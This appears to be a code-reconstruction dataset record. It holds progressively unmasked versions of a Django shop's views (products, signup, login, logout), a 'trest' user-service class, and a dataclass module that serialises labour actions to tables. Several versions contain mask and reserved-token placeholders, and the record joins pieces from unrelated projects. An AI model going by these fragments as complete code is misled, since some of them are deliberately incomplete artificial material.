"step-3": "<mask token>\n\n\ndef product_list(request):\n products = Product.objects.filter(available=True)\n context = {'products': products, 'user': request.user}\n return render(request, 'shop/product/list.html', context)\n\n\ndef product_detail(request, id, slug):\n product = get_object_or_404(Product, id=id, slug=slug, available=True)\n cart_product_form = CartAddProductForm()\n context = {'product': product, 'cart_product_form': cart_product_form}\n return render(request, 'shop/product/detail.html', context)\n\n\nclass UserFormView(View):\n form_class = UserForm\n template_name = 'shop/signup.html'\n\n def get(self, request):\n form = self.form_class(None)\n return render(request, self.template_name, {'form': form})\n\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user.set_password(password)\n user.save()\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return redirect('/shop/')\n return render(request, self.template_name, {'form': form})\n\n\ndef user_login(request):\n context = {'form': UserLogInForm}\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user:\n login(request, user)\n return redirect('/shop/')\n else:\n context['error'] = 'Provide valid credentials'\n return render(request, 'shop/login.html', context)\n else:\n return render(request, 'shop/login.html', context)\n\n\ndef user_logout(request):\n if request.method == 'POST':\n logout(request)\n return render(request, 'shop/login.html')\n",
"step-4": "from typing import Dict, Any\nfrom urllib import request\nfrom django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse\nfrom .models import Product\nfrom cart.forms import CartAddProductForm\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom .forms import UserForm, UserLogInForm\nfrom django.views import generic\nfrom django.views.generic import View\n\n\ndef product_list(request):\n products = Product.objects.filter(available=True)\n context = {'products': products, 'user': request.user}\n return render(request, 'shop/product/list.html', context)\n\n\ndef product_detail(request, id, slug):\n product = get_object_or_404(Product, id=id, slug=slug, available=True)\n cart_product_form = CartAddProductForm()\n context = {'product': product, 'cart_product_form': cart_product_form}\n return render(request, 'shop/product/detail.html', context)\n\n\nclass UserFormView(View):\n form_class = UserForm\n template_name = 'shop/signup.html'\n\n def get(self, request):\n form = self.form_class(None)\n return render(request, self.template_name, {'form': form})\n\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user.set_password(password)\n user.save()\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return redirect('/shop/')\n return render(request, self.template_name, {'form': form})\n\n\ndef user_login(request):\n context = {'form': UserLogInForm}\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user:\n login(request, user)\n return redirect('/shop/')\n else:\n context['error'] = 'Provide valid credentials'\n return render(request, 'shop/login.html', context)\n else:\n return render(request, 'shop/login.html', context)\n\n\ndef user_logout(request):\n if request.method == 'POST':\n logout(request)\n return render(request, 'shop/login.html')\n",
"step-5": "from typing import Dict, Any\nfrom urllib import request\n\nfrom django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse\n\nfrom .models import Product\nfrom cart.forms import CartAddProductForm\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom .forms import UserForm, UserLogInForm\nfrom django.views import generic\nfrom django.views.generic import View\n\n\ndef product_list(request):\n products = Product.objects.filter(available=True)\n\n context = {'products': products,\n 'user': request.user}\n return render(request, 'shop/product/list.html', context)\n\n\ndef product_detail(request, id, slug):\n product = get_object_or_404(Product, id=id, slug=slug, available=True)\n cart_product_form = CartAddProductForm()\n context = {'product': product,\n 'cart_product_form': cart_product_form}\n return render(request, 'shop/product/detail.html', context)\n\n\nclass UserFormView(View):\n form_class = UserForm\n template_name = 'shop/signup.html'\n\n # display blank form\n def get(self, request):\n form = self.form_class(None)\n return render(request, self.template_name, {'form': form})\n\n # process form data\n def post(self, request):\n form = self.form_class(request.POST)\n\n if form.is_valid():\n\n user = form.save(commit=False)\n\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user.set_password(password)\n user.save()\n\n user = authenticate(username=username, password=password)\n\n if user is not None:\n if user.is_active:\n login(request, user)\n #print(request.user.is_authenticated())\n return redirect('/shop/')\n\n return render(request, self.template_name, {'form': form})\n\n\ndef user_login(request):\n context = {\n 'form': UserLogInForm\n }\n if request.method == \"POST\":\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user:\n login(request, user)\n return redirect('/shop/')\n else:\n context['error'] = \"Provide valid credentials\"\n return render(request, 'shop/login.html', context)\n else:\n return render(request, 'shop/login.html', context)\n\n\ndef user_logout(request):\n if request.method == 'POST':\n logout(request)\n\n return render(request, \"shop/login.html\")\n\n\n\n\n\n\n",
"step-ids": [
4,
6,
8,
9,
10
]
}
|
[
4,
6,
8,
9,
10
] |
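One detail worth calling out in UserFormView above: the raw password from
cleaned_data must pass through set_password(), which stores a salted hash,
before save(); assigning it directly would leave authenticate() with nothing
to match. A sketch of just that step, assuming the standard
django.contrib.auth User model inside a configured Django project:

from django.contrib.auth import authenticate
from django.contrib.auth.models import User


def register(username: str, password: str):
    user = User(username=username)
    user.set_password(password)  # hashes the password; never stores it raw
    user.save()
    # authenticate() hashes the submitted password and compares the hashes.
    return authenticate(username=username, password=password)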
<|reserved_special_token_0|>
class UserService(object):
<|reserved_special_token_0|>
@staticmethod
def get(id):
"""获取单条记录
[description]
Arguments:
id int -- 主键
return:
User Model 实例 | None
"""
if not id:
raise JsonError('ID不能为空')
obj = User.Q.filter(User.id == id).first()
return obj
<|reserved_special_token_0|>
@staticmethod
def insert(param):
"""插入
[description]
Arguments:
id int -- 主键
param dict -- [description]
return:
True | JsonError
"""
columns = [i for i, _ in User.__table__.columns.items()]
param = {k: v for k, v in param.items() if k in columns}
if 'created_at' in columns:
param['created_at'] = utime.timestamp(3)
try:
obj = User(**param)
User.session.add(obj)
User.session.commit()
return True
except Exception as e:
User.session.rollback()
SysLogger.error(e)
raise JsonError('insert error')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class UserService(object):
<|reserved_special_token_0|>
@staticmethod
def get(id):
"""获取单条记录
[description]
Arguments:
id int -- 主键
return:
User Model 实例 | None
"""
if not id:
raise JsonError('ID不能为空')
obj = User.Q.filter(User.id == id).first()
return obj
@staticmethod
def update(id, param):
"""更新记录
[description]
Arguments:
id int -- 主键
param dict -- [description]
return:
True | JsonError
"""
columns = [i for i, _ in User.__table__.columns.items()]
param = {k: v for k, v in param.items() if k in columns}
if 'updated_at' in columns:
param['updated_at'] = utime.timestamp(3)
if not id:
raise JsonError('ID 不能为空')
try:
User.Update.filter(User.id == id).update(param)
User.session.commit()
return True
except Exception as e:
User.session.rollback()
SysLogger.error(e)
raise JsonError('update error')
@staticmethod
def insert(param):
"""插入
[description]
Arguments:
id int -- 主键
param dict -- [description]
return:
True | JsonError
"""
columns = [i for i, _ in User.__table__.columns.items()]
param = {k: v for k, v in param.items() if k in columns}
if 'created_at' in columns:
param['created_at'] = utime.timestamp(3)
try:
obj = User(**param)
User.session.add(obj)
User.session.commit()
return True
except Exception as e:
User.session.rollback()
SysLogger.error(e)
raise JsonError('insert error')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class UserService(object):
@staticmethod
def page_list(where, page, per_page):
"""列表记录
Arguments:
where dict -- 查询条件
page int -- 当前页
per_page int -- 每页记录数
return:
Paginate 对象 | None
"""
query = User.Q
if 'status' in where.keys():
query = query.filter(User.status == where['status'])
else:
query = query.filter(User.status != -1)
pagelist_obj = query.paginate(page=page, per_page=per_page)
return pagelist_obj
@staticmethod
def get(id):
"""获取单条记录
[description]
Arguments:
id int -- 主键
return:
User Model 实例 | None
"""
if not id:
raise JsonError('ID不能为空')
obj = User.Q.filter(User.id == id).first()
return obj
@staticmethod
def update(id, param):
"""更新记录
[description]
Arguments:
id int -- 主键
param dict -- [description]
return:
True | JsonError
"""
columns = [i for i, _ in User.__table__.columns.items()]
param = {k: v for k, v in param.items() if k in columns}
if 'updated_at' in columns:
param['updated_at'] = utime.timestamp(3)
if not id:
raise JsonError('ID 不能为空')
try:
User.Update.filter(User.id == id).update(param)
User.session.commit()
return True
except Exception as e:
User.session.rollback()
SysLogger.error(e)
raise JsonError('update error')
@staticmethod
def insert(param):
"""插入
[description]
Arguments:
id int -- 主键
param dict -- [description]
return:
True | JsonError
"""
columns = [i for i, _ in User.__table__.columns.items()]
param = {k: v for k, v in param.items() if k in columns}
if 'created_at' in columns:
param['created_at'] = utime.timestamp(3)
try:
obj = User(**param)
User.session.add(obj)
User.session.commit()
return True
except Exception as e:
User.session.rollback()
SysLogger.error(e)
raise JsonError('insert error')
<|reserved_special_token_1|>
from trest.utils import utime
from trest.logger import SysLogger
from trest.config import settings
from trest.exception import JsonError
from applications.common.models.user import User
class UserService(object):
@staticmethod
def page_list(where, page, per_page):
"""列表记录
Arguments:
where dict -- 查询条件
page int -- 当前页
per_page int -- 每页记录数
return:
Paginate 对象 | None
"""
query = User.Q
if 'status' in where.keys():
query = query.filter(User.status == where['status'])
else:
query = query.filter(User.status != -1)
pagelist_obj = query.paginate(page=page, per_page=per_page)
return pagelist_obj
@staticmethod
def get(id):
"""获取单条记录
[description]
Arguments:
id int -- 主键
return:
User Model 实例 | None
"""
if not id:
raise JsonError('ID不能为空')
obj = User.Q.filter(User.id == id).first()
return obj
@staticmethod
def update(id, param):
"""更新记录
[description]
Arguments:
id int -- 主键
param dict -- [description]
return:
True | JsonError
"""
columns = [i for i, _ in User.__table__.columns.items()]
param = {k: v for k, v in param.items() if k in columns}
if 'updated_at' in columns:
param['updated_at'] = utime.timestamp(3)
if not id:
raise JsonError('ID 不能为空')
try:
User.Update.filter(User.id == id).update(param)
User.session.commit()
return True
except Exception as e:
User.session.rollback()
SysLogger.error(e)
raise JsonError('update error')
@staticmethod
def insert(param):
"""插入
[description]
Arguments:
id int -- 主键
param dict -- [description]
return:
True | JsonError
"""
columns = [i for i, _ in User.__table__.columns.items()]
param = {k: v for k, v in param.items() if k in columns}
if 'created_at' in columns:
param['created_at'] = utime.timestamp(3)
try:
obj = User(**param)
User.session.add(obj)
User.session.commit()
return True
except Exception as e:
User.session.rollback()
SysLogger.error(e)
raise JsonError('insert error')
<|reserved_special_token_1|>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from trest.utils import utime
from trest.logger import SysLogger
from trest.config import settings
from trest.exception import JsonError
from applications.common.models.user import User
class UserService(object):
@staticmethod
def page_list(where, page, per_page):
"""列表记录
Arguments:
where dict -- 查询条件
page int -- 当前页
per_page int -- 每页记录数
return:
Paginate 对象 | None
"""
query = User.Q
if 'status' in where.keys():
query = query.filter(User.status == where['status'])
else:
query = query.filter(User.status != -1)
pagelist_obj = query.paginate(page=page, per_page=per_page)
return pagelist_obj
@staticmethod
def get(id):
"""获取单条记录
[description]
Arguments:
id int -- 主键
return:
User Model 实例 | None
"""
if not id:
raise JsonError('ID不能为空')
obj = User.Q.filter(User.id == id).first()
return obj
@staticmethod
def update(id, param):
"""更新记录
[description]
Arguments:
id int -- 主键
param dict -- [description]
return:
True | JsonError
"""
columns = [i for (i, _) in User.__table__.columns.items()]
param = {k:v for k,v in param.items() if k in columns}
if 'updated_at' in columns:
param['updated_at'] = utime.timestamp(3)
if not id:
raise JsonError('ID 不能为空')
try:
User.Update.filter(User.id == id).update(param)
User.session.commit()
return True
except Exception as e:
User.session.rollback()
SysLogger.error(e)
raise JsonError('update error')
@staticmethod
def insert(param):
"""插入
[description]
Arguments:
id int -- 主键
param dict -- [description]
return:
True | JsonError
"""
columns = [i for (i, _) in User.__table__.columns.items()]
param = {k:v for k,v in param.items() if k in columns}
if 'created_at' in columns:
param['created_at'] = utime.timestamp(3)
try:
obj = User(**param)
User.session.add(obj)
User.session.commit()
return True
except Exception as e:
User.session.rollback()
SysLogger.error(e)
raise JsonError('insert error')
|
flexible
|
{
"blob_id": "d1ed43bab6171c876b2ad9ef9db834ab8f9026d5",
"index": 8411,
"step-1": "<mask token>\n\n\nclass UserService(object):\n <mask token>\n\n @staticmethod\n def get(id):\n \"\"\"获取单条记录\n\n [description]\n\n Arguments:\n id int -- 主键\n\n return:\n User Model 实例 | None\n \"\"\"\n if not id:\n raise JsonError('ID不能为空')\n obj = User.Q.filter(User.id == id).first()\n return obj\n <mask token>\n\n @staticmethod\n def insert(param):\n \"\"\"插入\n\n [description]\n\n Arguments:\n id int -- 主键\n param dict -- [description]\n\n return:\n True | JsonError\n \"\"\"\n columns = [i for i, _ in User.__table__.columns.items()]\n param = {k: v for k, v in param.items() if k in columns}\n if 'created_at' in columns:\n param['created_at'] = utime.timestamp(3)\n try:\n obj = User(**param)\n User.session.add(obj)\n User.session.commit()\n return True\n except Exception as e:\n User.session.rollback()\n SysLogger.error(e)\n raise JsonError('insert error')\n",
"step-2": "<mask token>\n\n\nclass UserService(object):\n <mask token>\n\n @staticmethod\n def get(id):\n \"\"\"获取单条记录\n\n [description]\n\n Arguments:\n id int -- 主键\n\n return:\n User Model 实例 | None\n \"\"\"\n if not id:\n raise JsonError('ID不能为空')\n obj = User.Q.filter(User.id == id).first()\n return obj\n\n @staticmethod\n def update(id, param):\n \"\"\"更新记录\n\n [description]\n\n Arguments:\n id int -- 主键\n param dict -- [description]\n\n return:\n True | JsonError\n \"\"\"\n columns = [i for i, _ in User.__table__.columns.items()]\n param = {k: v for k, v in param.items() if k in columns}\n if 'updated_at' in columns:\n param['updated_at'] = utime.timestamp(3)\n if not id:\n raise JsonError('ID 不能为空')\n try:\n User.Update.filter(User.id == id).update(param)\n User.session.commit()\n return True\n except Exception as e:\n User.session.rollback()\n SysLogger.error(e)\n raise JsonError('update error')\n\n @staticmethod\n def insert(param):\n \"\"\"插入\n\n [description]\n\n Arguments:\n id int -- 主键\n param dict -- [description]\n\n return:\n True | JsonError\n \"\"\"\n columns = [i for i, _ in User.__table__.columns.items()]\n param = {k: v for k, v in param.items() if k in columns}\n if 'created_at' in columns:\n param['created_at'] = utime.timestamp(3)\n try:\n obj = User(**param)\n User.session.add(obj)\n User.session.commit()\n return True\n except Exception as e:\n User.session.rollback()\n SysLogger.error(e)\n raise JsonError('insert error')\n",
"step-3": "<mask token>\n\n\nclass UserService(object):\n\n @staticmethod\n def page_list(where, page, per_page):\n \"\"\"列表记录\n Arguments:\n where dict -- 查询条件\n page int -- 当前页\n per_page int -- 每页记录数\n\n return:\n Paginate 对象 | None\n \"\"\"\n query = User.Q\n if 'status' in where.keys():\n query = query.filter(User.status == where['status'])\n else:\n query = query.filter(User.status != -1)\n pagelist_obj = query.paginate(page=page, per_page=per_page)\n return pagelist_obj\n\n @staticmethod\n def get(id):\n \"\"\"获取单条记录\n\n [description]\n\n Arguments:\n id int -- 主键\n\n return:\n User Model 实例 | None\n \"\"\"\n if not id:\n raise JsonError('ID不能为空')\n obj = User.Q.filter(User.id == id).first()\n return obj\n\n @staticmethod\n def update(id, param):\n \"\"\"更新记录\n\n [description]\n\n Arguments:\n id int -- 主键\n param dict -- [description]\n\n return:\n True | JsonError\n \"\"\"\n columns = [i for i, _ in User.__table__.columns.items()]\n param = {k: v for k, v in param.items() if k in columns}\n if 'updated_at' in columns:\n param['updated_at'] = utime.timestamp(3)\n if not id:\n raise JsonError('ID 不能为空')\n try:\n User.Update.filter(User.id == id).update(param)\n User.session.commit()\n return True\n except Exception as e:\n User.session.rollback()\n SysLogger.error(e)\n raise JsonError('update error')\n\n @staticmethod\n def insert(param):\n \"\"\"插入\n\n [description]\n\n Arguments:\n id int -- 主键\n param dict -- [description]\n\n return:\n True | JsonError\n \"\"\"\n columns = [i for i, _ in User.__table__.columns.items()]\n param = {k: v for k, v in param.items() if k in columns}\n if 'created_at' in columns:\n param['created_at'] = utime.timestamp(3)\n try:\n obj = User(**param)\n User.session.add(obj)\n User.session.commit()\n return True\n except Exception as e:\n User.session.rollback()\n SysLogger.error(e)\n raise JsonError('insert error')\n",
"step-4": "from trest.utils import utime\nfrom trest.logger import SysLogger\nfrom trest.config import settings\nfrom trest.exception import JsonError\nfrom applications.common.models.user import User\n\n\nclass UserService(object):\n\n @staticmethod\n def page_list(where, page, per_page):\n \"\"\"列表记录\n Arguments:\n where dict -- 查询条件\n page int -- 当前页\n per_page int -- 每页记录数\n\n return:\n Paginate 对象 | None\n \"\"\"\n query = User.Q\n if 'status' in where.keys():\n query = query.filter(User.status == where['status'])\n else:\n query = query.filter(User.status != -1)\n pagelist_obj = query.paginate(page=page, per_page=per_page)\n return pagelist_obj\n\n @staticmethod\n def get(id):\n \"\"\"获取单条记录\n\n [description]\n\n Arguments:\n id int -- 主键\n\n return:\n User Model 实例 | None\n \"\"\"\n if not id:\n raise JsonError('ID不能为空')\n obj = User.Q.filter(User.id == id).first()\n return obj\n\n @staticmethod\n def update(id, param):\n \"\"\"更新记录\n\n [description]\n\n Arguments:\n id int -- 主键\n param dict -- [description]\n\n return:\n True | JsonError\n \"\"\"\n columns = [i for i, _ in User.__table__.columns.items()]\n param = {k: v for k, v in param.items() if k in columns}\n if 'updated_at' in columns:\n param['updated_at'] = utime.timestamp(3)\n if not id:\n raise JsonError('ID 不能为空')\n try:\n User.Update.filter(User.id == id).update(param)\n User.session.commit()\n return True\n except Exception as e:\n User.session.rollback()\n SysLogger.error(e)\n raise JsonError('update error')\n\n @staticmethod\n def insert(param):\n \"\"\"插入\n\n [description]\n\n Arguments:\n id int -- 主键\n param dict -- [description]\n\n return:\n True | JsonError\n \"\"\"\n columns = [i for i, _ in User.__table__.columns.items()]\n param = {k: v for k, v in param.items() if k in columns}\n if 'created_at' in columns:\n param['created_at'] = utime.timestamp(3)\n try:\n obj = User(**param)\n User.session.add(obj)\n User.session.commit()\n return True\n except Exception as e:\n User.session.rollback()\n SysLogger.error(e)\n raise JsonError('insert error')\n",
"step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom trest.utils import utime\nfrom trest.logger import SysLogger\nfrom trest.config import settings\nfrom trest.exception import JsonError\nfrom applications.common.models.user import User\n\n\nclass UserService(object):\n @staticmethod\n def page_list(where, page, per_page):\n \"\"\"列表记录\n Arguments:\n where dict -- 查询条件\n page int -- 当前页\n per_page int -- 每页记录数\n\n return:\n Paginate 对象 | None\n \"\"\"\n query = User.Q\n\n if 'status' in where.keys():\n query = query.filter(User.status == where['status'])\n else:\n query = query.filter(User.status != -1)\n\n pagelist_obj = query.paginate(page=page, per_page=per_page)\n return pagelist_obj\n\n @staticmethod\n def get(id):\n \"\"\"获取单条记录\n\n [description]\n\n Arguments:\n id int -- 主键\n\n return:\n User Model 实例 | None\n \"\"\"\n if not id:\n raise JsonError('ID不能为空')\n obj = User.Q.filter(User.id == id).first()\n return obj\n\n @staticmethod\n def update(id, param):\n \"\"\"更新记录\n\n [description]\n\n Arguments:\n id int -- 主键\n param dict -- [description]\n\n return:\n True | JsonError\n \"\"\"\n columns = [i for (i, _) in User.__table__.columns.items()]\n param = {k:v for k,v in param.items() if k in columns}\n if 'updated_at' in columns:\n param['updated_at'] = utime.timestamp(3)\n\n if not id:\n raise JsonError('ID 不能为空')\n\n try:\n User.Update.filter(User.id == id).update(param)\n User.session.commit()\n return True\n except Exception as e:\n User.session.rollback()\n SysLogger.error(e)\n raise JsonError('update error')\n\n @staticmethod\n def insert(param):\n \"\"\"插入\n\n [description]\n\n Arguments:\n id int -- 主键\n param dict -- [description]\n\n return:\n True | JsonError\n \"\"\"\n columns = [i for (i, _) in User.__table__.columns.items()]\n param = {k:v for k,v in param.items() if k in columns}\n if 'created_at' in columns:\n param['created_at'] = utime.timestamp(3)\n try:\n obj = User(**param)\n User.session.add(obj)\n User.session.commit()\n return True\n except Exception as e:\n User.session.rollback()\n SysLogger.error(e)\n raise JsonError('insert error')\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
@dataclass
class Actions:
""" The class for a set of actions.
This class is a collection of actions. It is used for the four primary
use cases:
- to serialize the list of actions into a dataframe
- to serialize the list of actions into a markdown/html table
- to create and populate an Actions instance from a dataframe
- to create and populate an Actions instance from a markdown document
"""
action_id: ClassVar = 'actions'
actions: List[Action] = field(default_factory=lambda : [])
fields: List[str] = field(default_factory=lambda : [key for key, value in
Action.__dataclass_fields__.items() if value.type != ClassVar])
def __len__(self) ->int:
""" Get the number of actions. """
return len(self.actions)
def __eq__(self, other):
""" Overrides the default implementation for equality. """
if isinstance(other, Actions):
return self.actions == other.actions
return False
def sort(self, *args, **kwargs) ->'Actions':
""" Sorts the list of actions. """
self.actions.sort(*args, **kwargs)
return self
def append(self, action: Action):
""" Append an action onto this instance of Actions. """
self.actions.append(action)
def to_df(self) ->pd.DataFrame:
""" Converts this instance of Actions to a df. """
data = []
for action in self.actions:
data.append(action.to_df())
df = pd.read_json(json.dumps(data), orient='list')
return df[self.fields]
def to_md(self):
""" Convert this instance of Actions to markdown/HTML. """
soup = BeautifulSoup(f'<div id={self.action_id}></div>', 'html.parser')
for action in self.actions:
table = soup.new_tag('table')
soup.div.append(table)
for meta_field in Action._meta_fields:
table[meta_field] = action.__getattribute__(meta_field)
for field in self.fields:
if action.__getattribute__(field) is None:
continue
if field in Action._meta_fields:
continue
tr = soup.new_tag('tr')
td_key = soup.new_tag('td', attrs={'class': 'field-key'})
td_val = soup.new_tag('td', attrs={'class': 'field-value'})
td_key.string = field
td_val = action.to_md(field, td_val)
tr.append(td_key)
tr.append(td_val)
table.append(tr)
return soup.prettify()
@classmethod
def read_from_md(cls, md_doc: MarkdownDocument) ->'Actions':
""" Create and populate an Actions instance from a Markdown Document. """
md_data = re.findall(f'<div id="{cls.action_id}">+[\\s\\S]+<\\/div>',
md_doc)
assert len(md_data
) == 1, f'multiple divs with id={cls.action_id} were found'
md_data = md_data[0]
soup = BeautifulSoup(md_data, 'html.parser')
tables = soup.div.find_all('table')
actions = Actions()
for table in tables:
action = Action.create_from_md(table)
actions.append(action)
return actions
@staticmethod
def read_from_df(df: pd.DataFrame) ->'Actions':
""" Create and populate an Actions instance from a dataframe. """
actions = Actions()
for i, row in df.iterrows():
action = Action.create_from_row(row)
actions.append(action)
return actions
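# Editor's note: an illustrative usage sketch, not part of the original
# module. It assumes the full Action class that is masked above; all
# constructor arguments are hypothetical sample data.
def _container_demo() ->'Actions':
    actions = Actions()
    actions.append(Action(date='2020-01-15', sources=[
        'https://example.com/a'], action='protest', struggles=
        'pay_and_benefits', description='hypothetical sample action'))
    actions.sort()  # in-place sort by date via Action.__lt__, returns self
    assert len(actions) == 1  # __len__ delegates to the underlying list
    return actions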
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@dataclass
class Action:
<|reserved_special_token_0|>
date: str
sources: List[Url]
action: str
struggles: List[str]
description: str
locations: List[str] = None
companies: List[str] = None
workers: int = None
tags: List[str] = None
author: str = None
_meta_fields: ClassVar = ['author']
_valid_struggles: ClassVar = ['ethics', 'pay_and_benefits',
'working_conditions', 'discrimination', 'unfair_labor_practices',
'job_security']
_valid_actions: ClassVar = ['strike', 'protest', 'open_letter',
'legal_action', 'union_drive', 'union_representation']
@staticmethod
def is_none(field: Any) ->bool:
if field is None:
return True
elif isinstance(field, float) and math.isnan(field):
return True
elif isinstance(field, str) and field.lower() == 'none':
return True
elif isinstance(field, (list,)) and len(field) == 0:
return True
else:
return False
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def to_md(self, field: str, td: bs4.element.Tag) ->str:
""" Convert field for markdown
Takes a td BeautifulSoup object and updates it according to the field
type so that it renders correctly in markdown.
"""
assert field in self.__dataclass_fields__, f'Cannot serialize {field}. Not a valid field in Action.'
value = self.__getattribute__(field)
if field in ['date', 'workers']:
td.string = str(value)
elif field in ['locations', 'struggles', 'companies', 'tags']:
td.string = str(value).strip('[').strip(']').replace("'", ''
).replace('"', '')
elif field == 'sources':
ret = []
for source in value:
tag = (
f"<a href='{source}' target='_blank'>{urlparse(source).netloc}</a>"
)
ret.append(tag)
td.append(BeautifulSoup(html.unescape(', '.join(ret)),
'html.parser'))
else:
td.string = value
return td
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@dataclass
class Actions:
""" The class for a set of actions.
This class is a collection of actions. It is used for the four primary
use cases:
- to serialize the list of actions into a dataframe
- to serialize the list of actions into a markdown/html table
- to create and populate an Actions instance from a dataframe
- to create and populate an Actions instance from a markdown document
"""
action_id: ClassVar = 'actions'
actions: List[Action] = field(default_factory=lambda : [])
fields: List[str] = field(default_factory=lambda : [key for key, value in
Action.__dataclass_fields__.items() if value.type != ClassVar])
def __len__(self) ->int:
""" Get the number of actions. """
return len(self.actions)
def __eq__(self, other):
""" Overrides the default implementation for equality. """
if isinstance(other, Actions):
return self.actions == other.actions
return False
def sort(self, *args, **kwargs) ->'Actions':
""" Sorts the list of actions. """
self.actions.sort(*args, **kwargs)
return self
def append(self, action: Action):
""" Append an action onto this instance of Actions. """
self.actions.append(action)
def to_df(self) ->pd.DataFrame:
""" Converts this instance of Actions to a df. """
data = []
for action in self.actions:
data.append(action.to_df())
df = pd.read_json(json.dumps(data), orient='list')
return df[self.fields]
def to_md(self):
""" Convert this instance of Actions to markdown/HTML. """
soup = BeautifulSoup(f'<div id={self.action_id}></div>', 'html.parser')
for action in self.actions:
table = soup.new_tag('table')
soup.div.append(table)
for meta_field in Action._meta_fields:
table[meta_field] = action.__getattribute__(meta_field)
for field in self.fields:
if action.__getattribute__(field) is None:
continue
if field in Action._meta_fields:
continue
tr = soup.new_tag('tr')
td_key = soup.new_tag('td', attrs={'class': 'field-key'})
td_val = soup.new_tag('td', attrs={'class': 'field-value'})
td_key.string = field
td_val = action.to_md(field, td_val)
tr.append(td_key)
tr.append(td_val)
table.append(tr)
return soup.prettify()
@classmethod
def read_from_md(cls, md_doc: MarkdownDocument) ->'Actions':
""" Create and populate an Actions instance from a Markdown Document. """
md_data = re.findall(f'<div id="{cls.action_id}">+[\\s\\S]+<\\/div>',
md_doc)
assert len(md_data
) == 1, f'multiple divs with id={cls.action_id} were found'
md_data = md_data[0]
soup = BeautifulSoup(md_data, 'html.parser')
tables = soup.div.find_all('table')
actions = Actions()
for table in tables:
action = Action.create_from_md(table)
actions.append(action)
return actions
@staticmethod
def read_from_df(df: pd.DataFrame) ->'Actions':
""" Create and populate an Actions instance from a dataframe. """
actions = Actions()
for i, row in df.iterrows():
action = Action.create_from_row(row)
actions.append(action)
return actions
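# Editor's note: an illustrative sketch, not part of the original module.
# to_md() renders one <table> per action inside a <div id="actions">;
# read_from_md() locates that div again and rebuilds the collection, so the
# two calls are intended to round-trip via Actions.__eq__.
def _md_round_trip(actions: 'Actions') ->'Actions':
    md_doc = actions.to_md()
    return Actions.read_from_md(md_doc)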
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@dataclass
class Action:
<|reserved_special_token_0|>
date: str
sources: List[Url]
action: str
struggles: List[str]
description: str
locations: List[str] = None
companies: List[str] = None
workers: int = None
tags: List[str] = None
author: str = None
_meta_fields: ClassVar = ['author']
_valid_struggles: ClassVar = ['ethics', 'pay_and_benefits',
'working_conditions', 'discrimination', 'unfair_labor_practices',
'job_security']
_valid_actions: ClassVar = ['strike', 'protest', 'open_letter',
'legal_action', 'union_drive', 'union_representation']
@staticmethod
def is_none(field: Any) ->bool:
if field is None:
return True
elif isinstance(field, float) and math.isnan(field):
return True
elif isinstance(field, str) and field.lower() == 'none':
return True
elif isinstance(field, (list,)) and len(field) == 0:
return True
else:
return False
<|reserved_special_token_0|>
def __post_init__(self):
""" Used to validate fields. """
self.date = dateparser.parse(self.date).date()
self.sources = self.listify(self.sources)
self.struggles = self.listify(self.struggles)
self.action = self.action.strip().lower()
self.companies = self.listify(self.companies)
self.tags = self.listify(self.tags)
self.locations = self.listify(self.locations)
self.workers = None if self.is_none(self.workers) else int(self.workers
)
assert self.action in self._valid_actions, f"'{self.action}' is not a valid input. Valid inputs are: {self._valid_actions}"
for struggle in self.struggles:
assert struggle in self._valid_struggles, f"'{struggle}' is not a valid input. Valid inputs are: {self._valid_struggles}"
for source in self.sources:
assert BeautifulSoup(source, 'html.parser'
).a is not None or urlparse(source
).netloc != '', f"'{source}' is invalid. source must be a valid url or an html link tag element"
self.sources = [(BeautifulSoup(source, 'html.parser').a['href'] if
'href' in source else source) for source in self.sources]
def __lt__(self, other):
""" Used to make Actions sortable. """
return self.date < other.date
def __eq__(self, other):
""" Overrides the default implementation for equality. """
if isinstance(other, Action):
return self.__dict__.items() == other.__dict__.items()
return False
def to_df(self) ->Dict[str, Any]:
""" Return dict of all fields serialized to string """
return {key: self.render_df(key) for key, value in self.__dict__.
items()}
def render_df(self, field: str) ->str:
""" Return the value of the field rendered for df. """
value = self.__getattribute__(field)
if field in ['date', 'workers']:
return str(value)
elif field in ['locations', 'struggles', 'companies', 'tags', 'sources'
]:
return str(value).strip('[').strip(']').replace("'", '').replace(
'"', '')
else:
return value
def to_md(self, field: str, td: bs4.element.Tag) ->str:
""" Convert field for markdown
Takes a td BeautifulSoup object and updates it according to the field
type so that it renders correctly in markdown.
"""
assert field in self.__dataclass_fields__, f'Cannot serialize {field}. Not a valid field in Action.'
value = self.__getattribute__(field)
if field in ['date', 'workers']:
td.string = str(value)
elif field in ['locations', 'struggles', 'companies', 'tags']:
td.string = str(value).strip('[').strip(']').replace("'", ''
).replace('"', '')
elif field == 'sources':
ret = []
for source in value:
tag = (
f"<a href='{source}' target='_blank'>{urlparse(source).netloc}</a>"
)
ret.append(tag)
td.append(BeautifulSoup(html.unescape(', '.join(ret)),
'html.parser'))
else:
td.string = value
return td
